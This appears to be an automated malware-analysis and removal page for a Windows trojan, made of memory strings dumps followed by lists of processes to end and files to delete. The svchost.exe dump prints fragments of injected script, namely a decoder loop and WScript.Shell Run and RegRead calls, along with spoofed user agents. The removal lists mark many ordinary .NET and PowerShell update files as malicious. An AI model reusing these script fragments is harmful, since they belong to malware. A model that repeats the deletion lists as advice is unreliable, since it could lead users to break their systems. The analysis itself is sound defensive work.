b0a6ULYdjlZ7V5WaB7r/FLr2AbF4672A85JVt2eIvN5wF8z/66Ju29JfXggSyonEYQf9PGDzX7LkmbqyMPXhjwPnShcGcFIcInswotoj2JKnp9R8QUXS5xP8RBHjpur6/adfZj7/cl0mu5ZCkPL0OKkxhk97m3P1BmPdzHsIHLBoynG2 ZiZf4wImTixwy0twy01Ud7tlVaMQ8f9ZhBuH5JUIf0 peZl3NTbjDS2rwXHC8hM8qKLMRkwOK1o71yveLrg6rJVdtfIYs4AZRGiVcsIxKM/ioAIh 3M IngboQPJtq/HtHFsxST0TgiMJZJK QONshSV/ntzXMpqxMzudlXMhiOhfPFKBG1fk3rrvxlTenuay NiLSXE2zjo9ijHRBdfoXHeYsBYerXth1pCxug6oRXvvhHx98sWFoTFS2nDLT/PE3Ch2oz RQ62S/mz7Bumzq7o1QrMLAedEx6JFKhJ56AVUsKKrqPQhz0Xs5HhQtmFviOnlZwFIve/liZvZ9hva9ax/xWO6CVFbyX4p6gTVpiJcb3nbAfwd2RsvDsphxC7/L2zOQ 9 oDk1DFxxqahMrmBk1NL0nlcVrn4p9FqhVHVJb1eSMX60EUyJAFQx7aub8ZRgGjDolQdNTSGR52IZc9tklef0R agccDIpUtvSWk8D9AM3ZlN6VCsqEX pvfWMFXzskuU4FOzCpsH2baMNbo Qfg8hpOzrFsHwjOG 4RMpiIHcqP5fINrN1Jl4hDWYZuvttYtRPidECBesYX2NREqTmtoQfGgsF5Lu2PSpnHUzD7CrZIso6DBQtJf2uoGAStiRPe3uPo5ypA/HpItvFFXnbYJ4tJWIIjKWD8ViskcRwGdRVk ysoJx7IKnDewRWpSyTRPSuocoSGTjxcTkIIcfmNVhTz630dLAWlkaIzntjY1UPyfahpf6GYUOYSsynB6vYQ6j1JAzsJ4YWLbHaLa/M9en3qyQjbuBFhdm5 
.Default
SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
svchost.exe
explorer.exe
66006666
.Method '%s' not supported by automation object/Variant does not reference an automation object
External exception %x
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction%Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'
Invalid variant operation"Variant method calls not supported
I/O error %d
Integer overflow Invalid floating point operation

mscorsvw.exe_3848:

.text
`.data
.rsrc
@.reloc
EX_CATCH line %d
CACHE_S_FORMATETC_NOTSUPPORTED
CTL_E_GETNOTSUPPORTEDATRUNTIME
CTL_E_GETNOTSUPPORTED
CTL_E_SETNOTSUPPORTEDATRUNTIME
CTL_E_SETNOTSUPPORTED
CO_E_SERVER_EXEC_FAILURE
MK_E_INTERMEDIATEINTERFACENOTSUPPORTED
REGDB_E_KEYMISSING
OLE_E_ADVISENOTSUPPORTED
CO_E_INIT_SCM_EXEC_FAILURE
EX_THROW Type = 0x%x HR = 0x%x, line %d
ThrowHR: HR = %x
mscorsvw.pdb
_amsg_exit
_acmdln
MSVCR100_CLR0400.dll
_crt_debugger_hook
RegCloseKey
RegQueryInfoKeyW
RegOpenKeyExW
ADVAPI32.dll
GetWindowsDirectoryW
GetCPInfo
GetProcessHeap
KERNEL32.dll
MsgWaitForMultipleObjectsEx
USER32.dll
mscoree.dll
ole32.dll
OLEAUT32.dll
.PAVException@@
v1.0.3705
.PAVOutOfMemoryException@@
.PAVHRException@@
7 7$7(7,7074787
6$6,686\6|6
advapi32.dll
Wtsapi32.dll
kernel32.dll
mscorsvc.dll
Microsoft .NET Runtime Optimization Service
Microsoft .NET Runtime Optimization Service has been uninstalled
Failed to uninstall Microsoft .NET Runtime Optimization Service
Microsoft .NET Runtime Optimization Service has been installed
Failed to install Microsoft .NET Runtime Optimization Service
Failed to retrieve Microsoft .NET Runtime Optimization Service interface
Set service status to %d
Service control handler op %u, event type %u
\ndpsetup.bat
Created repair process in session %d, process ID %d
Unable to create repair process, error %d
Microsoft.NET\NETFXRepair.exe
Error changing token session ID, error %d
Error duplicating current process token, error %d
Error getting current process token, error %d
Session %u has become active.
Aborting repair due to unexpected wait status %u
Found active session %u
Aborting repair due to error %u from WTSEnumerateSessions
StartServiceCtrlDispatcher failed with error %d. Will try slow path
\fusion.localgac
\v2.0.50727
SOFTWARE\Microsoft\.NetFramework
v4.0.0
SOFTWARE\Microsoft\.NETFramework\NGenQueueMSI\WIN32\Default
SOFTWARE\Microsoft\.NETFramework\NGenQueue\WIN32\Default
ngenrootstorelock.dat
ngenservicelock.dat
FastStartupCheck(isPrivateRuntime=%d)
yKERNEL32.DLL
Software\Microsoft\.NETFramework
RestrictedGCStressExe
EnableInternetHREFexes
NGENServiceWaitPassiveWork
NGENServicePassiveWorkWaitTimeout
NGENServicePassiveHardDiskIdleTimeout
NGENServicePassiveExceptInputTimeout
MD_ForceNoColDesSharing
UNSUPPORTED_DbgDontResumeThreadsOnUnhandledException
DbgTransportProxyAddress
DbgRedirectCreateCmd
DbgRedirectCommonCmd
DbgRedirectAttachCmd
mscorrc.dll
v4.0.30319
.NET Runtime Optimization Service
4.0.30319.1 (RTMRel.030319-0100)
mscorsvw.exe
.NET Framework
4.0.30319.1

svchost.exe_316_rwx_00080000_000B2000:

.idata
.reloc
P.rsrc
Portions Copyright (c) 1983,99 Borland
kernel32.dll
Software\Microsoft\Windows NT\CurrentVersion
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
URLMON.DLL
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].play();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].Play();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].PLAY();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].play();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].Play();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].PLAY();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].playVideo();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].playVideo();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].start();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].Start();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].START();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].start();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].Start();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].START();}} catch(e){}
try {var els=document.getElementsByTagName('video'); for(var i=0;i<els.length;i++){ els[i].play();}} catch(e){}
try {jwplayer().play()} catch(e){}
PSAPI.dll
setcpu:
:setcpu
HTTP/1.1
.length;
+=String.fromCharCode(parseInt(
.substr(
,2),16));
+=String.fromCharCode(
,1).charCodeAt()^
,1).charCodeAt());
.length-1)?
=new ActiveXObject("WScript.Shell");
.Environment("Process"))("
.Run("
=new ActiveXObject("WScript.Shell");
.RegRead("
wininet.dll
user32.dll
ntdll.dll
psapi.dll
"svchost.exe"
svchost.exe
ole32.dll
Kernel32.dll
\\.\LCD
1234567890
Shell32.dll
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
hXXp://
0123456789
Mozilla
?456789:;<=
!"#$%&'()*+,-./0123
.text
`.rdata
@.pdata
KERNEL32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
oleaut32.dll
RegOpenKeyExW
RegCreateKeyW
RegCreateKeyA
GetCPInfo
SetProcessWindowStation
OpenWindowStationA
EnumChildWindows
NtQueryValueKey
NtDeleteValueKey
NtSetValueKey
HttpSendRequestA
HttpOpenRequestA
atl.dll
wsock32.dll
shell32.dll
ShellExecuteExW
wtsapi32.dll
Wtsapi32.dll
PSAPI.DLL
winmm.dll
urlmon.dll
UrlMkSetSessionOption
<%<*<;<@<
:!:%:):-:1:
?:???_?}?
.Default
SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
svchost.exe
explorer.exe
66006666
.Method '%s' not supported by automation object/Variant does not reference an automation object
External exception %x
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction%Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'
Invalid variant operation"Variant method calls not supported
I/O error %d
Integer overflow Invalid floating point operation

svchost.exe_316_rwx_01000000_00006000:

.text
`.data
.rsrc
ADVAPI32.dll
KERNEL32.dll
NTDLL.DLL
RPCRT4.dll
NETAPI32.dll
ole32.dll
ntdll.dll
RegCloseKey
RegOpenKeyExW
GetProcessHeap
NtOpenKey
svchost.pdb
\PIPE\
Software\Microsoft\Windows NT\CurrentVersion\Svchost
\Registry\Machine\System\CurrentControlSet\Control\SecurePipeServers\
5.1.2600.5512 (xpsp.080413-2111)
svchost.exe
Windows
Operating System
5.1.2600.5512


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    mofcomp.exe:2760
    WindowsXP-KB968930-x86-ENG.exe:368
    ngen.exe:1788
    ngen.exe:1024
    ngen.exe:1236
    ngen.exe:3784
    ngen.exe:3820
    ngen.exe:2312
    ngen.exe:3872
    ngen.exe:3944
    ngen.exe:2268
    ngen.exe:3388
    ngen.exe:1152
    ngen.exe:4024
    ngen.exe:1584
    ngen.exe:1032
    ngen.exe:2256
    ngen.exe:3664
    ngen.exe:2116
    ngen.exe:2212
    %original file name%.exe:148
    %original file name%.exe:1736
    update.exe:576
    PSCustomSetupUtil.exe:3920
    PSCustomSetupUtil.exe:2868
    PSCustomSetupUtil.exe:2908
    PSCustomSetupUtil.exe:1784
    PSCustomSetupUtil.exe:2924
    PSCustomSetupUtil.exe:3320
    PSCustomSetupUtil.exe:3000
    PSCustomSetupUtil.exe:2424
    PSCustomSetupUtil.exe:3164
    PSCustomSetupUtil.exe:2304
    PSCustomSetupUtil.exe:2176
    PSCustomSetupUtil.exe:2684
    PSCustomSetupUtil.exe:500
    PSCustomSetupUtil.exe:2460
    PSCustomSetupUtil.exe:2624
    PSCustomSetupUtil.exe:2704
    PSCustomSetupUtil.exe:2284
    PSCustomSetupUtil.exe:2588
    PSCustomSetupUtil.exe:3464
    PSCustomSetupUtil.exe:224
    PSCustomSetupUtil.exe:1880
    PSCustomSetupUtil.exe:3392
    PSCustomSetupUtil.exe:780
    PSCustomSetupUtil.exe:2556
    PSCustomSetupUtil.exe:3784
    PSCustomSetupUtil.exe:2572
    mscorsvw.exe:3568
    wsmanhttpconfig.exe:1932
    wsmanhttpconfig.exe:2476

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %System%\wbem\Logs\mofcomp.log (1817 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\tmpCF.tmp (1 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\winrshost.exe (22 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_wildcards.help.txt (3 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_while.help.txt (2 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_signing.help.txt (12 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\system.management.automation.resources.dll (3153 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\filesystem.format.ps1xml (133 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_aliases.help.txt (6 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_quoting_rules.help.txt (659 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\wsmanhttpconfig.exe (3009 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_command_precedence.help.txt (8 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\pssetupnativeutils.exe (9 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\microsoft.backgroundintelligenttransfer.management.dll (1537 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_type_operators.help.txt (5 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_functions_advanced_parameters.help.txt (962 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_remote_requirements.help.txt (6 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\powershell.exe (7339 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_variables.help.txt (6 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_remote_faq.help.txt (775 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_do.help.txt (2 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\wsmprovhost.exe (657 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_pssessions.help.txt (9 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_pssnapins.help.txt (6 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_if.help.txt (3 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.commands.diagnostics.dll (998 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_wmi_cmdlets.help.txt (8 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_remote_troubleshooting.help.txt (146 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.editor.dll (14450 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\powershellcore.format.ps1xml (1492 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_remote_output.help.txt (887 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_remote_jobs.help.txt (13 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\winrsmgr.dll (2 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\microsoft.wsman.management.dll (5010 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_prompts.help.txt (7 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\getevent.types.ps1xml (15 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.commands.management.dll-help.xml (28236 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\update\update.inf (2457 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\winrssrv.dll (12 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_eventlogs.help.txt (5 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_functions_advanced.help.txt (3 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_preference_variables.help.txt (37 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_windows_powershell_ise.help.txt (6 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_ref.help.txt (1 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\system.management.automation.dll (38414 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\spuninst.exe (3787 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\wsmpty.xsl (1 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\compiledcomposition.microsoft.powershell.gpowershell.dll (1737 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\spupdsvc.exe (287 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\spmsg.dll (495 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_return.help.txt (3 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_line_editing.help.txt (1 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_join.help.txt (2 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.security.dll-help.xml (1797 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.graphicalhost.resources.dll (16 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_operators.help.txt (770 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\microsoft.wsman.management.resources.dll (13 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\windowspowershellhelp.chm (26041 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_properties.help.txt (7 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\update\update.exe (10748 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\wsman.format.ps1xml (837 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.graphicalhost.dll (4408 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_debuggers.help.txt (21 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.commands.utility.resources.dll (508 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\types.ps1xml (2510 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.consolehost.resources.dll (778 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_pipelines.help.txt (411 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_transactions.help.txt (1011 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\wsmwmipl.dll (2816 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\powershell_ise.resources.dll (4 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_trap.help.txt (10 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_profiles.help.txt (457 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.consolehost.dll-help.xml (900 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\wsmauto.dll (1842 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.commands.diagnostics.resources.dll (470 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\pwrshmsg.dll (4 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_providers.help.txt (59 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_throw.help.txt (5 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\pwrshplugin.dll (802 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\winrscmd.dll (2907 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.gpowershell.resources.dll (408 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_locations.help.txt (794 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_methods.help.txt (6 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_arrays.help.txt (8 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.commands.utility.dll (9684 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\update\update.ver (14 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.commands.utility.dll-help.xml (20810 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_language_keywords.help.txt (11 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.commands.management.resources.dll (508 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\powershell.exe.mui (10 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_script_blocks.help.txt (3 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_path_syntax.help.txt (5 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.commands.diagnostics.dll-help.xml (2301 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_comment_based_help.help.txt (595 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_automatic_variables.help.txt (14 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\pspluginwkr.dll (1756 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_assignment_operators.help.txt (379 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\powershell_ise.exe (2526 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_reserved_words.help.txt (1 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\winrmprov.dll (591 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\wevtfwd.dll (3351 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_remote.help.txt (7 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\winrm.cmd (35 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\update\updspapi.dll (5940 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\microsoft.wsman.management.dll-help.xml (8740 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\system.management.automation.dll-help.xml (16567 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_functions_cmdletbindingattribute.help.txt (3 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\wsmauto.mof (4 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_functions_advanced_methods.help.txt (9 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\bitstransfer.psd1 (950 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\dotnettypes.format.ps1xml (266 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_continue.help.txt (1 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_modules.help.txt (13 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_objects.help.txt (2 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\wsmsvc.dll (15909 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_jobs.help.txt (12 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_arithmetic_operators.help.txt (168 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_bits_cmdlets.help.txt (7 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_core_commands.help.txt (221 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_foreach.help.txt (10 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_history.help.txt (3 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_pssession_details.help.txt (9 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_ws-management_cmdlets.help.txt (405 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\bitstransfer.format.ps1xml (16 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_split.help.txt (10 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_execution_policies.help.txt (13 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\wsmres.dll (6164 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\importallmodules.psd1 (438 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_for.help.txt (146 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\$shtdwn$.req (788 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_script_internationalization.help.txt (9 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\powershelltrace.format.ps1xml (344 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\eventforwarding.adm (2 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_functions.help.txt (586 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_windows_powershell_2.0.help.txt (453 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_types.ps1xml.help.txt (481 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\default.help.txt (2 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\registry.format.ps1xml (20 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\wsmplpxy.dll (603 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_hash_tables.help.txt (6 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_session_configurations.help.txt (276 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\update\kb968930xp.cat (512 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_regular_expressions.help.txt (5 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\profile.ps1 (772 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_escape_characters.help.txt (2 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_special_characters.help.txt (3 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\winrm.vbs (2727 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_environment_variables.help.txt (417 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_requires.help.txt (2 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\microsoft.backgroundintelligenttransfer.management.resources.dll (7 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_job_details.help.txt (824 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_commonparameters.help.txt (12 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_parsing.help.txt (2 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\pwrshsip.dll (24 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_command_syntax.help.txt (5 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_break.help.txt (792 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\windowsremoteshell.adm (12 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_logical_operators.help.txt (2 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.editor.resources.dll (562 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_comparison_operators.help.txt (11 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_scripts.help.txt (12 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\update\spcustom.dll (23 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_scopes.help.txt (76 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\microsoft.wsman.runtime.dll (33 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\microsoft.backgroundintelligenttransfer.management.dll-help.xml (2472 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\microsoft.backgroundintelligenttransfer.management.interop.dll (1532 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.security.resources.dll (9 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\winrm.ini (1956 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_format.ps1xml.help.txt (17 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_parameters.help.txt (9 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_data_sections.help.txt (5 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.gpowershell.dll (9738 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_try_catch_finally.help.txt (7 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\update\eula.txt (586 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\wsmtxt.xsl (2 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\certificate.format.ps1xml (155 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\windowsremotemanagement.adm (574 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_switch.help.txt (489 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\winrmprov.mof (789 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_redirection.help.txt (2 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\winrs.exe (1154 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\wtrinstaller.ico (4803 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\help.format.ps1xml (3947 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\diagnostics.format.ps1xml (590 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\pscustomsetuputil.exe (316 bytes)
    %WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1104 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\Startupx\system.pif (1425 bytes)
    %System%\SETBF.tmp (42 bytes)
    %System%\WindowsPowerShell\v1.0\SET86.tmp (4 bytes)
    %System%\WindowsPowerShell\v1.0\SETB7.tmp (16 bytes)
    %System%\SET12.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET3E.tmp (1281 bytes)
    %System%\GroupPolicy\Adm\SET35.tmp (12 bytes)
    %System%\SETC.tmp (2105 bytes)
    %System%\WindowsPowerShell\v1.0\SET58.tmp (36 bytes)
    %System%\WindowsPowerShell\v1.0\SET51.tmp (14022 bytes)
    %System%\WindowsPowerShell\v1.0\SET84.tmp (11 bytes)
    %System%\WindowsPowerShell\v1.0\SET46.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SET41.tmp (601 bytes)
